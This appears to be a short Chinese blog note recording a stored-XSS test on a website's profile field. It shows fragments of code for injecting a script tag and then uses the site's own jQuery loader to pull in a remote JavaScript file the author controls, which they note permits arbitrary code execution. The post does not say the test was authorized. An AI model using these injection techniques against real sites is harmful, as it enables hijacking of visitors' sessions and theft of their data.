第二次XSS测试

这次 ，主要是别人给讲会的 ，自己也听明白了，记录下 操作过程 ....

首先，寻找有显示的注入点，找到一处 ，直接上手测试弹窗

输入完成发现并没有理想的直接弹窗 ，当点击删除，突然弹窗

这里是运用ajax ，单独局部加载的 ，也就是除非刷新这一块东西，否则代码不会更新，这样的js 代码岂不是很无用？！

谁闲得没事 ，点你个人兴趣啊 ，正统的应该是 ，你打开个人页面 直接弹窗，这是理想的

然后换标签注入 这里使用<svg>  然后是调用js 代码执行远程js  调用

只能这样
                b='script'        长度11
        a.createElement(b) 长度19 a=document.createElement('script');
    a.src=xxx     你的远程js地址
        document.head.append(child)
    精简？
        a=document;  长度12

但是，看看长度不可行！！！

没办法了 ，只能看看他们有没有jquery 可以使用了

看到这个 ，有重新燃起来插它的欲火 哈哈

我们这样用, 首先将地址 用变量b 保存起来

然后调用 $loadJs(b) 执行 js代码 ,让他们自己的东西 插自己

最后 调用js 文件 （文件里边只有一个alert(/xss/)）,然后弹窗 ，这次弹窗和之前的弹窗就不一样了 ，这个文件是自己可以控制的 ，

可以执行任意代码~